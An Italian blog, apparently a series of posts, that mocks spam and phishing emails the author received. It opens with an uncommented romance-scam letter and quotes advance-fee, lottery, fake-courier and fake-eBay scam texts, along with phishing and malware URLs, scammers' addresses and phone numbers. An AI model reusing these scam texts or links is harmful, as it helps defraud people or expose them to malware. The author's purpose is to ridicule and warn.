Io non so che io ho spinto su
esso un passo ma io ho deciso ciononostante di provare la felicita! Ora io non so che da questo esso per risultare ma io spero che tutti saranno buoni!

Quindi Lei ora sa dove io vivo anche gradirei continuare! Attualmente io lavoro ed io lavoro come il direttore!

Bene io penso abbastanza del mio lavoro! Scriva dove anche come che i lavori Lei? Se il Suo lavoro e piacevole a
Lei?

Ometta per il mio lavoro io ho molti hobby per esempio io raccolgo monete antiche. A me quale grande raccolta
Io valuto.
Io posso dire circa me che io attivo lo sportivo. Piaccia giocare a tennis di tavola e mi piaccia un gioco degli scacchi!

Voglia dargli la piccola rappresentazione sul mio carattere. Puo dire quell'amichevole e socievole. Io molto
raramente e adirato ed a tutto io non amo disputa.
E piacevole a me e nella societa allegra ed io apprezzo il buon senso di umore. Mi piacciono uomini arguti. E che preferenze a Lei? Va in per sport?

Io leghero la mia fotografia a questa lettera io lo spero a Lei e piacevole. Gradirei vedere le Sue fotografie
se a Lei e.
Io spero che la nostra amicizia comincera con questa lettera e e piu tardi possibile relazioni piu serie
se questo che che Lei vuole.
Scrivo cosi perche io realmente sono aggiustato seriamente e sinceramente io spero che a Lei?

Ed io non chiedero Lei mi aiuta con soldi. Io conosco molte storie lo. Se Lei scrivera a me piu, Lei capira che io non sono tale ragazza!
Io sono la semplice ragazza in Ucraina che vuole vivere all'estero. Io voglio abbia marito e famiglia di destra. Io tentero moltissimo per questo. Io ho intenzione molto seria

Su lui io voglio finire questa lettera ed io aspettero la Sua risposta. Mio email : XXXXX@gmail.com Il Sofia di distinti saluti!
=-=-=-=-=-=-=-=-=

Uno dei tanti messaggi di spam che ho ricevuto oggi è stato scritto da qualcuno che ha avuto anche la faccia tosta di terminare il testo con la frase «Il presente messaggio non è da considerarsi spam ma un punto di incontro tra le strutture e i clienti che amano prenotare direttamente senza intermediari.». In questi casi mi verrebbe voglia di usare il napalm, spiegando che l'incendio prodotto non è da considerarsi vandalismo ma un punto di incontro tra le strutture e i clienti che amano esprimere il loro parere direttamente senza intermediari.

C'è però una cosa che mi ha preoccupato: quando ho letto il nome dello spammatore (ItaliaDream, potete andare sul .it o sul .com) ho pensato che fossero quelli di Magic Italy della coppietta Maria Vittoria Brambilla-Silvio Berlusconi.

Ho bisogno di riposo?

L'altro giorno un messaggio di spam che è riuscito a superare i filtri googleschi era inviato da tal David, che afferma di essere affiliato di europartners (casinò online) e dice «Vi ho trovati su chiavi rilevanti del settore su Google». David aggiunge «Come sapete questo settore e' molto redditizio, i nostri prodotti hanno un'ottima conversione e retention grazie al lavoro dell'internal marketing e supporto in italiano.» e che «paghiamo in revenue share e cpa a seconda delle vostre richieste.» Non so cosa sia cpa, ma credo che sopravviverò alla ferale notizia.

La cosa che però mi ha fatto più ridere è che per due volte David scrive euroPATners.com, senza la r. (sito inesistente, tra l'altro). Il nome corretto del sito - fortunatamente per lui - sta nella sua firma elettronica, magari qualcuno riesce anche a contattarlo. Però, giovine David: non sei nemmeno capace a spammare scrivendo il tuo indirizzo?

Tra i messaggi di spam che gmail nasconde alla mia vista ieri ce n'è stato uno di titolo "The World's Most Comfortable Jaw Supporter" che vendeva "Them (sic) Most Effective Anti-Snoring Product!"

Oggettivamente l'oggetto - che potete vedere qua, non garantisco su cookie vari - è praticamente una fascia che si mette intorno alla testa come nelle vignette dove uno ha il mal di denti: roba che a me non serve a nulla, visto che sono capace a russare a bocca chiusa, ma magari a qualcuno potrebbe servire. L'unica cosa che mi ha stupito è che Gmail ha deciso che il messaggio era phishing, mentre era un banale spam: l'indirizzo indicato in chiaro era effettivamente quello a cui uno veniva mandato. Bah, misteri.

Ieri sera il telefonino mi ha notificato due messaggi sulla casella di posta aziendale. Guardando i titoli ho pensato che avrei potuto aspettare stamattina per farmici una risata su, e in effetti...

Il primo è uno dei soliti messaggi di ricerca riciclatori di denaro, tradotto a manovella: la frase fondamentale che dà un segno a tutto il messaggio è credo «E-maiI: Pio.Bergomi.72@googlemail.com (proprio questa scatola, e non qualcuno con il quale ave te ricevuto questa lettera!)». (notate che non c'è scritto e-mail con una l minuscola, ma con una I maiuscola.

Il secondo è intitolato "Impresa semplice". Peccato che sia un messaggio del mio datore di lavoro.

È un po' che non racconto dei messaggi di spam che mi arrivano, anche perché non ho notato tecniche particolarmente interessanti. Però i titoli di due messaggi odierni sono abbastanza interessanti da condividere per fare - spero - sorridere qualcuno.
Il primo in effetti non è che dica molto, se non dare l'idea di una telenovela: Compresse, che si Amano! Perfetto!. Ma il secondo ha un suo senso. Parla delle pastigliette azzurre (quelle che ormai sono descritte come "Vi" per evitare gli antispam di primo livello e fors'anche evitare azioni legali dalla Pfizer); c'è la classica traduzione delle mirabolanti proprietà, che terminano con la frase "Solo fra un breve periodo di tempo– lei ricevera 12 pillole in aggiunta assolutamente gratis" (sì, fra un breve periodo di tempo. Mi chiedo quale traduttore automatico converta "for" in "fra"); e ci viene ricordato che "Si puo ordinare nel regime di Online ". Ma soprattutto c'è il titolo: «RedBull per il Suo pene migliore». Considerando che la pubblicità della Red Bull ha come slogan "Ti mette le ali" (o se preferite l'originale inglese "Gives you wings", l'appropriatezza mi pare estrema!

Come forse magari non sapete, non tutti i prodotti di Google funzionano bene, e ogni tanto a Mountain View ne cancellano alcuni: un esempio è Google Notebook, che doveva servire a salvarsi delle pagine Web annotate. Amen, ci sono molti altri sistemi per farlo, e nessuno piangerà per questo... nemmeno io che ho ancora qui in basso a destra sul mio Firefox l'iconcina per l'estensione. D'altra parte sono molto pigro.

In compenso, sembra che qualcuno sia riuscito a craccare il sistema... oppure Google Notebook è stato chiuso perché il sistema era stato craccato troppe volte. Un messaggio di spam di quelli cinesi che mi arrivano via ufficio aveva infatti come link una pagina pubblica del notebook: il testo del messaggio è infatti

Salva ora se davvero Adobe prodotti da noi. Leggi in che modo e possibile risparmiare il 50%.
Cosi si puo davvero risparmiare. Tuttavia tale azione Gils solo in primavera, ora disponibile!
http://www.google.com/notebook/public/09617793467796484069/BDQgkQgoQ6JqMxYEk

e la poesia presente nel link merita davvero di essere letta:

"Vuoi veramente con i nostri prodotti software salvare? In primavera, e un segreto il codice promozionale ADBE-1803"

A parte le solite battute, messaggi come questo diventano più difficili da filtrare, perché non c'è nessun appiglio facile per trovare parole sentinella: insomma, tempi duri per chi combatte lo spam.

Ieri casualmente mi sono arrivate due segnalazioni di spammatori italiani.

Il primo messaggio, speditomi da booksworm, è abbastanza standard: l'azienda XXX
"si occupa di Email Marketing dal 2001. Da poco abbiamo allestito un reparto dedicato alla vendita di indirizzi email di aziende e privati che abbiamo raccolto in questi 8 anni di attività."
Per darvi un'idea, gli amici ci spiegano che "Possiamo fornirvi di (sic) 15.000.000 di email aziendali e privati per promuovere i vostri prodotti o servizi; Pacchetti da 500.000 email al costo di 120 euro".
Se prendiamo per buoni i dati della ricerca di cui scrissi qualche mese fa (0,1 successi per milione) è chiaro che solo un imbecille comprerebbe uno di questi pacchetti. Ma d'altra parte solo un imbecille comprerebbe servizi da uno spammatore. Il guaio è che questo messaggio è arrivato a una casella istituzionale di un'università... non si sa mai cosa potrebbe capitare.

Il secondo messaggio è stato inoltrato da un amico in una lista di vecchi internettari.
"Oggi č nata la nuova versione di YYY, che ti consente di gestire le tue newsletter e di avere sempre *smtp* funzionanti e non inseriti nelle liste nere antispam. Si, hai capito bene, il software carica in automatico i server smtp, non ti dovrai piĂą preoccupare di cercarli, ci pensiamo noi. [...] Ricevi questa newsletter perchč sei iscritto al network di ZZZ"
Inutile dire che il mio amico non è affatto iscritto al network in questione, ma non è questo il punto. Il tipo che gli ha spedito quella mail (il più noto spammatore italiano) non ha nessun problema a dire che fa un programma che cerchi apposta server di posta funzionanti... un po' come quelli che ti vendono del software con i controlli della validità della copia disabilitati per "semplificare l'installazione". Immagino, visto come sono arrivate le lettere accentate, che quel messaggio è arrivato da una nazione che non usa il nostro charset ISO-8859-1 ma uno slavo... oppure uno turco, se il tipo continua a lavorare con i suoi amichetti.

Sarà una coincidenza, oppure anche gli spammatori risentono della crisi e devono cercare nuovi mercati?
(ah, nel caso vi chiedeste perché non ho messo i nomi: non è per privacy, ma perché è abbastanza logico che gli amici spammatori facciano ricerche sul nome del loro "prodotto")

Mi sono arrivati un paio di messaggi con intestatario wikio, che mostravano un link che con wikio c'entrava nulla, visto che era
http://host15-125-static.61-88-b.business.telecomitalia.it/www.wikio.it/societa/droghe/cocaina/
Se uno ci cliccava sopra, si beccava il virus VBS_PSYME.GEN, infilato lì probabilmente da qualcuno che aveva craccato il sito. Ho usato l'imperfetto perché, mentre cercavo di scoprire dove segnalare a Telecom l'increscioso caso, ho notato che il malware era stato rimosso. Mi stupisco di tale solerzia :-)

Ormai le truffe nigeriane di tipo 419 stanno diventando troppo note, e gli spammer devono inventarsi il possibile e l'impossibile per convincere il poll... ehn, il fortunato interlocutore della loro identità. Tra gli ultimi messaggi ricevuti ho il soldato americano che ha trovato gli spiccioli di Saddam Hussein (25 milioni di dollari, briciole...) ma soprattutto questo post di "FedEX":

We have been waiting for you to contact us for your Confirmed Package that is registered with us for shipping to your residential location.We had thought that your sender gave you our contact details.It may interest you to know that a letter is also added to your package.
However, we cannot quote its content to you via email for privacy reasons. We understand that the content of your package itself is a Bank Draft worth of $87,000.00 USD, FedEx Redstar Courier do not ship money in CASH or in CHEQUES but Bank Drafts are shippable.The package is registered with us for mailing by your colleague, and your colleague who said that he is from the United States but he is here in Ghana for a three (3) months mining Project as he works with a Gold Mining consultant firm in West Africa, Ghana.

Si sa, la privacy è sempre la privacy! Però credo che il record della fantasia spammatoria sia il referrer che mi sono trovato in questi giorni. Come forse sapete, quizilla.com è un sito che permette di creare e condividere dei test; insomma i quisssss che ogni tanto vi propino. Ma oltre ai quiz uno può anche scrivere dei racconti, nella sezione "stories". Bene; un referrer (ovviamente fasullo) arrivato al mio sito in questi giorni punta a un "racconto di quizilla" che invita a comprare le pastigline rosa simili a quelle azzurre che tutti noi conosciamo. Per la curiosità dei miei ventun lettori, la "storia" è qua: cliccare qui dovrebbe essere ragionevolmente sicuro, mentre non vi consiglierei di cliccare sulla pagina successiva, yahhooo.info/levitra.htm.

Ci ho perso un po' di tempo per capire cosa diavolo volesse dire il titolo del messaggio di spam che ho ricevuto, e che pubblicizzava un casinò online.
Poi sono andato a controllare come si dice "filatura" in inglese, ho scoperto che è "spinning", e tutto è tornato a posto. In pratica, l'amico spammatore aveva scritto "will keep you spinning", nel senso che "vi continuerà a far girare" (le ruote delle slot machine, immagino), solo che i traduttori automatici hanno ancora qualche problemuccio!

Lo so che non ci crederete, ma l'OPEC (da un bell'indirizzo open@promo.org, che in effetti fa la sua bella figura...) il 23 dicembre ha estratto uno dei miei tanti indirizzi di posta elettronica, e mi ha fatto vincere "Ј1,000,000.00 GBP". Non so cosa sia esattamente la J davanti, ed è vero che la sterlina è quasi in parità con l'euro, ma è sempre bello sapere certe cose, no? Certo che è chiaro che sono un po' sulle spese, tanto che hanno dovuto subappaltare in Cina (opec-claimsdpt@w.cn) la verifica di tutti i miei dati finanziari e di stato civile (!)
Ad ogni modo, la chicca migliore è il sistema con cui hanno fatto il sorteggio. Lo cito verbatim: « the selection process was carried out through a random selection in our Computerized Email Selection System (C.E.S.S.)». Garantisco che l'acronimo l'hanno scritto loro.

Tra lo spam di questi giorni, il messaggio di Pietro Molinari (nome che non mi è affatto nuovo, anche se non in questa sua incarnazione) non può rimanere relegato in una cartella che verrà automaticamente purgata. Almeno le parti principali devono avere i loro quindici minuti di fama, per la fama che può essere data dall'apparire su queste notiziole.
Il Molinari inizia il suo messaggio intitolato "CAMPAGNA PER L'ABOLIZIONE DEL FINANZIAMENTO PUBBLICO DEI PARTITI" (deve avere avuto un'offerta speciale sulle lettere maiuscole) con il titolo del suo "partito":
ALLEANZA DIO E POPOLO
Partito Etico Politico Onniconfessionale
e già qui devo dire che "Partito Etico Politico Onniconfessionale" è un nome che merita molto. Il PEPO è molto visivo, visto che come link mette una pagina di YouTube, pardon YOUTUBE, dove spiega il suo eso- ed essoterismo. Il testo unisce citazioni quasi da gestione del copyright, come
LO SLOGAN DIO E POPOLO E' DI GIUSEPPE MAZZINI ALLA PAGINA 476 DEL LIBRO INTITOLATO " GIUSEPPE MAZZINI - SCRITTI POLITICI"
a interessanti teorie semiotiche, tipo
LO STEMMA DEI CARABINIERI E' ISPIRATO AL PECCATO ORIGINALE :
-COL DETTO ALBERO PROIBITO DEL QUALE SI E1 PERDUTA LA CONOSCENZA SCIENTIFICA ;
-CON L'ARTIGLIO DEL LEONE CHE STRINGE INESORABILMENTE IL SERPENTE SIMBOLO DEL MALE !
Purtroppo Molinari alla fine mi casca proprio male. Non per la richiesta di soldi per finanziare il suo partito, quanto per la solita trita e ritrita frase
Siamo coscienti che e-mail indesiderate sono oggetto di disturbo, quindi La preghiamo di accettare le nostre piů sincere scuse se questa mail non č di Suo interesse. La presente č inviata in copia nascosta e, a norma della D Leg 196/2003, abbiamo reperito la Sua e-mail navigando in rete, o da e-mail che l'hanno resa pubblica, o da e-mail ricevute, o perché Lei č iscritto al nostro indirizzario.
(mi sa che ha comprato il PC in Slovenia e non è ancora stato capace di spostare il charset da ISO-8859-2 a ISO-8859-1) No, caro signor Molinari: questo è spam bello e buono e non accetto affatto le sue scuse. Le dico solo che sta già facendo parte del sistema contro cui si scaglia a parole.

Tra lo spam arrivatomi nel weekend sull'email dell'ufficio, ce n'è stato uno che effettivamente era molto carino.
Il messaggio era in HTML, pieno di link al sito dello spammatore; per la precisione, era formattato in una tabella con tre colonne, ciascuna delle quali conteneva una lista di parole. Ma le parole di ciascuna colonna avevano il loro stile css, tipo
P.Amazedness:first-letter {
COLOR: #53B350; FONT-SIZE: 260%
}
mentre la tabella era scritta in grigio molto piccolo. Il risultato finale lo potete vedere qua (tranquilli, è una GIF, non vi succede nulla a cliccarci su). Aggiungo che la dimensione delle lettere nella seconda colonna è leggeremente minore di quella delle altre due, in modo che l'immagine finale risulti piacevole all'occhio.
Bel lavoro, vero?

Non vorrei dire, ma se qualcuno vuole proprio mandarmi un messaggio di spam pubblicizzando la propria società di traduzioni magari dovrebbe scriverlo un po' meglio di così:

Faciamo le traduzioni di vari testi in 17 lingue.
sotto colist-translator potete inserire il testo desiderato, calcolare online un preventivo (il prezzo viene mostrato subito) e inviarci.
Nostri taduttori sono soltanto di madrelingua. Così una traduzione perfetta è garantita.

Insomma, babelfish funziona meglio...

Era quasi ora: dopo anni di spam "fatevi un mutuo, che i tassi sono favolosi", oggi mi è arrivato il primo spam "Proteggi la tua famiglia dalla recessione", con il tipo che scrive (in inglese, ma sono buono e ve lo traduco) «Sono un tipo qualunque che ha perfezionato un sistema per fare soldi veri nei tempi difficili (come quelli in cui ci troviamo). Ho guadagnato migliaia di dollari al mese nell'ultima recessione (2000-2002) e sto usando gli stessi mezzi per guadagnare di nuovo migliaia di dollari.»
A parte chiedermi cosa abbia fatto negli altri anni, mi sa tanto che il suo mezzo per guadagnare soldi sia vendere a caro prezzo il suo metodo piramidale... Ma come dicevo quello non è un problema, visto che tanto non ci vado a cliccare sul sito charm.domainnamemakeover.com del signor "Geek O'nomic". La cosa interessante è appunto vedere come lo spam - anche se un po' in ritardo - segue i ritmi dell'economia!

Mi è appena arrivato un comunicato dell'Internet Society (no, non sono socio ISOC, ma semplicemente un iscritto alla mailing list internazionale) che mi dice di stare attento, perché «Email scam falsely claims ISOC connection» cioè ci sono delle mail farlocche che affermano di provenire dall'ISOC.
In effetti mi era arrivato un messaggio da tale "Internet Society (ISOC)" <roland.schimek@hotmail.co.uk> che affermava nel titolo "You will be paid asap..!!!". Per la precisione dall'ISOC con sede a Ginevra (?) per un milione di sterline (??). Insomma, la solita truffa 419 nigeriana: nulla che valga la pena considerare.
Peccato solo che quel messaggio mi era arrivato il 10 novembre. O lo (pseudo)nigeriano è stato così fortunato (o lento) da non trovare nessun delatore verso ISOC, oppure gli amici ISOC non sono proprio dei fulmini di guerra...

Nel sito BBC si può leggere un bell'articolo su uno studio fatto "sul campo" per capire quanto possono guadagnare gli spammatori. Il gruppo di ricercatori californiani, per riuscire a fare delle stime per quanto possibile reali sulla reale efficacia delle campagne di spam, ha scelto la via più diretta: si sono infilati in una delle reti di botnet, vale a dire dei PC degli ignari utonti che si sono beccati il programma trojano degli spammer e adesso fungono da mittenti degli spam, e hanno preso il controllo di una parte di una delle principali reti, Storm. A un certo punto avevano 75000 pc a disposizione (che comunque erano meno di un decimo della rete di Storm) e hanno lanciato una campagna per indurre a comprare prodotti farmaceutici. Risultati? su 350 milioni di email inviate, solamente 28 persone sono andate a mettere i dati della loro carta di credito sul sito fasullo - immagino anche arrabbiandosi un po', perché il sistema ritornava loro un errore senza naturalmente salvarsi i dati. Di questi 28 ordini, 27 erano di pilloline blu e simili, per un totale di poco più di 100 dollari al giorno. Insomma, il tasso di penetrazione di uno spam è pari a 0,1 successi per milione, e i ricavi di uno spammatore con una grande rete di botnet sono stati stimati tra i 7000 e i 9500 dollari al mese: una discreta sommetta ma nulla di eclatante.
Questo significa però due cose: innanzitutto che un sistema del genere non potrebbe funzionare senza fare spam e non avere dunque spese di invio dei messaggi; e inoltre che non si può affatto pensare che gli spammatori smettano il loro traffico per mancanza di clienti, visto che ad ogni modo basta un tasso di risposta assolutamente minuscolo: rapportato al numero di navigatori italiani, è come se ci fossero due gonzi. Brutte nuove, insomma.
Il PDF dell'articolo sulla "Spamalyics" scritto dai ricercatori californiani è disponibile qua, per la cronaca, e il link è naturalmente ben visibile dalla pagina della BBC. Ancora una bella differenza con gli italici quotidiani, oltre al fatto che la divulgazione è fatta in maniera comprensibile.
Aggiornamento: (11 novembre) Questa volta sulla notizia ci è arrivato il Corsera: peccato che la signora o signorina Carboni non abbia letto l'articolo e abbia confuso i ricavi con i guadagni. Bisognerebbe mandarla a studiare da Tremonti, ma forse anche Visco va bene.

Tra il phishing di stamattina ce n'era uno (la solita cartolina) di qualcuno che ha capito come funzionano i cavalli di Troia: nel testo c'era infatti scritto
«This is a flash executable that you can save on your hard drive so you can look at it anytime you like!». Congratulazioni a chi ha capito come dare una spiegazione apparentemente logica di quello che succederà abbassi subito le difese della gente.
Detto questo, vi faccio notare il nome del sito dei phishers: http://myholyshit.de/cms/typo/GreetingCards.exe. Mi sa che in Italia nessuno sarebbe riuscito a registrare un nome simile: bene o male che sia, il Registro del ccTLD it. ha la possibilità di bloccare le richieste di nomi di questo tipo. Mi chiedo solo perché mai non abbiano scelto un nome un po' meno riconoscibile...

Il messaggio di spam del giorno ha come titolo ATM CARD PAYMENT e come mittente SENATE HOUSE [macarena@surnet.cl]. Mi promette questo:

This is to officially inform you that(ATM Card Number; (4278763100030014) has been accredited in your favor.Your Personal Identification Number is 2900. The ATM Card Value is $6.8MILLION USD. You are advice to contact Mr. Charles Brown via Email:(mrslindahi@rocketmail.com) with the following information's;
[lista di tutti i dati possibili e immaginabili]
Regards,
Senator David Mark
Please call +2347055489752 for Verification

Occhei, non è venuto così bene, visto che continua e si vede che è la risposta a un messaggio praticamente identico, con l'unica differenza che l'email di Charles Brown è deskofprofmark@live.com e il telefono di David Mark è +2348064682129. Però volete mettere la quantità di riferimenti, da Charlie Brown alla Macarena (e al capitano Mark, ma io sono un po' rovinato)? Un tuffo nel passato!

Dev'essere così, visto che l'alternativa (frequento troppi brasiliani) è indubbiamente falsa.
Tra i pacchi di spam nella casella email su tiscali, mi sono trovato la pubblicità del DIARIO JURIDICO - Agenda 2009, da tal jeamacedo@gmail.com, e un messaggio da
mundoforense@mundoforense.com.br che mi comunicava che é com enorme prazer que o convidamos para conhecer a Livraria MUNDO FORENSE.
Ora, è noto che il primo esempio di spam è stato fatto da avvocati. Ed è anche noto che molte delle truffe "419", quelle che chiedono i tuoi dati di conto corrente per mettere dentro i soldi di non so quale buonanima di dittatore africano, arrivano da sedicenti "barrister". Però questa recrudescenza mi preoccupa: quanto sta diventando comune fare l'avvocato?

Ho parlato troppo presto di miglior comprensibilità del testo dei messaggi di spam in italiano.
Questo è il messaggio che mi è arrivato ieri nella casella di posta aziendale:

E una grande garanzia, solo non uno Hugh selezione clienti ci hanno detto che hanno ricevuto italiano-fatto repliche.
Invece, essi istituito falso 'siti' e fingere di essere privati concessionari chiunque mail in un assegno o un vaglia e guardare la tua carta di credito.

Sono abituato a leggere i comunicati in sindacalese e trovarci un senso, anche se a volte avrei preferito non trovarlo; ma qua mi do per vinto. Nemmeno il titolo del messaggio, "Grande Acciao Inossidabile Filettati Viti", mi aiuta; cos'è, ci avvisano di non comprare le viti dai siti di phishing?

Ecco l'ultimo esemplare di spam ricevuto (senza nome e sito dello spammatore, e tagliando la parte in inglese:)

Caro amico
Questo è il saluto da XYZ Società Elettrica, uno dei più grandi elettrico grossista e dettagliante a Pechino, Cina, abbiamo principalmente vendere prodotti elettrici come fotocamere digitali, cellulari, TV LCD, Xbox, Laptop, DV, Mp4, GPS, la invitiamo a visitare il nostro sito web: --- per trovare qualcosa che vi interessa maggio e vi invitiamo a contattarci liberamente se avete qualsiasi domanda, siamo in grado di proporre prezzi più competitivi e di miglior servizio per la cooperazione commerciale con lei / la vostra azienda.

Diciamocelo: siamo arrivati a un testo che ricorda un po' Asterix e i Britanni ("uno dei più grandi elettrico grossista", "che vi interessa maggio"); però è comprensibile. Mi resta solo il dubbio se abbiano preso una persona in carne e ossa, oppure i sistemi di traduzione automatica sono diventati così precisi.

È un po' che non racconto più dei messaggi di spam e phishing ricevuti: d'altra parte anche gli spammatori stanno esaurendo la loro fantasia. Però i due messaggi ricevuti durante il weekend nella casella aziendale meritano. Eccoli qua:

From: Dettagli ora al Sicuro [thd.mugheddu@coopersecurity.it]
Subject: Consegniamo Immediatamente Tutte le Donazioni,
Gioielli, interminabili, puo promettere. Casi in cui una donna felice, sappiamo gia bene. Chiedere tasca molto rapidamente dopo ciascuna delle nausea, ora e per pagare con carta di credito.

From: Adesso In Tasca [hsandrea.biondi@pediatriamonza.it]
Subject: Ha Infine Cio che Stanno Cercando Sacco
Ottenere una tranquilla, si ha realmente bisogno. Immettere una donna, solo i migliori che abbiamo la migliore offerta e sufficiente entrare in. Daytona, Prada. Tutti gli orologi, e di tutte le esigenze di una donna.

(entrambi i messaggi terminano come al solito con un link a un sito, link che mi sono guardato bene dal cliccarci su)
Il problema è che le singole parole - a parte la mancanza delle lettere accentate - sono tutte italiane; perfino "consegniamo" è scritto con la i, cosa che credo metà degli italiani sbaglia. Però queste parole sono affastellate in modo assolutamente casuale: immagino qualcuno abbia faticosamente preso a uno a uno degli ideogrammi e cercato la loro traduzione in italiano. Solo che in questo modo il messaggio non giunge assolutamente al destinatario, il che mi fa sembrare inutile tutta la fatica fatta dal nostro ignoto spammatore che avrebbe potuto pagare qualcuno per farsi tradurre le frasi almeno in inglese (poi Babelfish avrebbe aiutato).
O forse è tutto un diabolico piano per far sì che l'ignaro destinatario clicchi e guardi di che diavolo si parli?

Come forse potete immaginare, uno dei punti deboli dei messaggi di phishing è la lingua usata per scriverli. Dato che la maggior parte dei phisher non sono di madrelingua inglese, hanno spesso dei problemi a scrivere un testo grammaticalmente corretto; è vero che credo che molti americani non si accorgano della differenza, ma non si sa mai, ed è sempre bene presentarsi al meglio.
Sono convinto che il messaggio di spam di stamattina sia proprio inteso a raggiungere tale scopo. Un sedicente signor "dare gawain" (che per la cronaca posta da un sito turco) mi chiede se sono interessato a un lavoro part-time:
«We will provide you with the texts for our employees with the important information and you will correct the texts as an english speaking person and send them back to us.»
Devo dire che se non fossi così pigro aprirei un'email usa-e-getta e risponderei all'amico, giusto per vedere cosa mi manderebbe!

Uno degli spam odierni, che mi vorrebbe vendere le solite pastigline blu, ha come sedicente mittente "Manual Friend". Ma la pastiglina non dovrebbe servire a farmi trovare amiche che mi apprezzano oltre alle famose Palmira e Manuela (o Manolita), come da battutacce?

Ieri pomeriggio, dando un'occhiata allo spam che mi era arrivato, ho notato che un messaggio dava un link a un sito .it. Verifico rapidamente e vedo che con ogni probabilità all'URL indicata c'è un dialer. A questo punto faccio un salto sulla base dati del NIC.it, prendo le email dei contatti tecnico e amministrativo, e li avviso del problema. Poi mi dimentico della cosa, anche perché avevo cose più serie da fare. Stasera vado a ricontrollare, e la pagina con il troiano in effetti non c'è più.
Tutto bene, intendiamoci: la cosa più importante è che nessuno venga infettato. Però almeno una mail con un "grazie per la segnalazione" avrebbero anche potuto spedirmela :-(

Stamattina ho ricevuto la segnalazione di un messaggio privato nei forum di Movable Type. Immaginavo di che si trattasse, ma ho comunque voluto dare un'occhiata: era il messaggio di tal "001100", che si era iscritto alle 8:33 e alle 8:40 mi aveva scritto dicendo "Hi, i've read your posts and i think you might be interested in this video". La parola "video" era un link all'url http://tinyurl.com/videos3 (da un po' di tempo a questa parte tinyurl ti permette di dare un nome personalizzato all'URL "accorciata") che punta a https://passkeeping.com/redir-x.php?r=http://www.youpornztube.com/codec/d5f31865ef3ae55eea5cce12e67ead4e/14/ . Cosa faccia youpornztube ve lo lascio immaginare (non ci ho mica cliccato io... e lynx mi chiedeva di accettare certificati che ovviamente non ho preso); più interessante sembra essere PassKeeping.com che a detta loro serve a creare sul proprio pc coppie username/password crittate da usare al posto di quelle giuste nel caso si sia paranoici e si debba usare un PC di qualcun altro. Ma qua divaghiamo... magari ne parlo un'altra volta.
La cosa buffa, se volete, è la differenza tra le conoscenze informatiche necessarie per fare tutto questo redirect, il tempo comunque necessario per iscriversi a un forum da parte del phisher/spammer, e il messaggio che non farebbbe cascare nessuno... o sono ottimista?

A furia di ricevere mail che ci comunicano che parenti stretti di notabili africani hanno bisogno di spostare soldi da un conto corrente a un altro e chiedono il vostro aiuto, magari abbiamo anche iniziato a sgamare qualcosa. Ma niente paura, i truffatori nigeriani sono pronti alla mossa successiva! Ecco il testo dell'ultimo phishing che mi è arrivato al riguardo:

From: "UN/EU FRAUD MONITORING UNIT" <uneufraudunitmonitoring.espana@gmail.com>
Subject: Your Recovered Funds

A joint effort instigated by a coalition of international monetary institutions with the help of Interpol has been able to track down diverted funds of foreign contractors and inheritance beneficiaries mostly from Africa and Europe. We have been working with other financial monetary institutions all over the globe and have entered agreement with the governments of the countries were these funds originated from.
In our fight to ensure that innocent hardworking people such as yourself are not taken advantage off by scammers who claim to want to transfer huge sums of money to you all in the guise of defrauding you of your hard-earned funds, we found out that you are not a victim of one of the several scams but, you are a victim of fund theft/diversion. You are among the list of the victims of corrupt government officials and bank staffs in Europe and Africa. These corrupt individuals and institutions are being investigated and prosecuted while arrangements has been concluded between the country where these funds originated from, World Bank, IMF, EU, UN, and Interpol on the safest and most secure means of getting the funds to the rightful beneficiaries.
eccetera eccetera. Riassunto, per chi non ha voglia di leggersi l'inglese: "Abbiamo scoperto che ci sono dei cattivoni nelle banche africane che hanno cercato di truffarvi. Ma noi siamo stati più bravi di loro, e li abbiamo bloccati. Adesso mandateci i vostri dati di conto corrente, e vi ridaremo indietro tutti i soldi, scusandoci per il disturbo".
Bisogna ammettere che non arriveranno ai livelli dell'italico spammer, però l'idea non è per nulla male, vero?

Ho già scritto di come i messaggi di spam che mi arrivano sulla casella di lavoro siano molto più divertenti di quelli sulla posta personale.
Anche in questo weekend gli esempi sono davvero interessanti, oserei quasi dire "poetici". Il primo ha mittente "Ideale declino", titolo "Saranno Felici se si Acquistano i Nostri" e testo Di ottenere il farmaco si ha bisogno. Noi non siamo domande stupide, consegnamo in modo rapido e sicuro. Il secondo, inviato da "Re Sani.Salute", è intitolato "Non piu Audace, Molto Rapido Ceclino" e dice Molto veloce la consegna di tutti i nostri farmaci. Noi siamo il piu veloce quando si tratta di salute. Ammetterete con me che sono frasi migliori di quelle che si trovano nei fortune cookie cinesi, no?
La cosa strana è che i due messaggi, pur sembrando dalla stessa mano e ountando a siti il cui nome è formato nello stesso modo (MATTERPOSITION e FEETSHIP.COM), hanno fatto giri completamente diversi. Il primo è stato postato da un server colombiano, e il sito è registrato per mezzo di un registrar tedesco da qualche russo (a giudicare da nome e indirizzo) che però ha affermato di stare a New York; il secondo è partito da un provider americano, un equivalente di Tiscali o Alice, e il sito non ha dati di registrazione. Si direbbe quasi che il nuovo stile sia di cercare di diversificarsi il più possibile...
Poi c'era anche l'altro messaggio che diceva di interiorizzarne i contenuti, ricorrendo anche al materiale illustrativo disponibile nel sito: ma poi ho osservato meglio, e quello proviene dal nostro amministratore delegato. Fortuna che non l'ho inviato alla casella di segnalazioni spam.

(alla fine mi sono scocciato, e ho creato una nuova categoria. Spero apprezzerete)

Di phishing riguardanti eBay ce ne sono molti: quello che ultimamente va più in voga è la domanda di un compratore, che più o meno educatamente ti dice che c'è qualcosa che non va e ti invita a rispondergli (sul sito del phisher, claro).
Da questo punto di vista è molto più rinfrescante l'ultimo esemplare: mi è arrivato da "eBay Assistenza clienti"<fondere@eay.it> - senza la b in eBay, esatto - che corrisponde all'IP 61.129.14.5, meao.net, registrato a Shangai quattro anni fa. Il testo però è con buona probabilità opera di russi: non solo perché il sito a cui si viene mandati è http://pages-help.by.ru/x.html, ma per il solito problema con le lettere accentate che probabilmente arrivano in cirillico e non appaiono sulla mia webmail se non come punti interrogativi. Il testo però merita:
Ti ringraziamo per il messaggio che hai inviato all'Assistenza clienti
di eBay.
L'indirizzo che hai usato non ? pi? in funzione e quindi non ? possibile
visualizzare il contenuto dell'email.
Per cortesia, inviaci nuovamente la tua domanda utilizzando il modulo
online Contatta l'Assistenza clienti che trovi alla pagina:
http://pages.ebay.it/help/contact_us/_base/index
Sì, con un minimo controllo di realtà potremmo accorgerci che se l'indirizzo usato non è in funzione (il che potrebbe anche essere vero) è un po' strano che sappiano che era stato inviato all'Assistenza Clienti: però a una prima lettura il tutto regge, e non è cosa da poco visto il livello dei phishing che arrivano di solito.

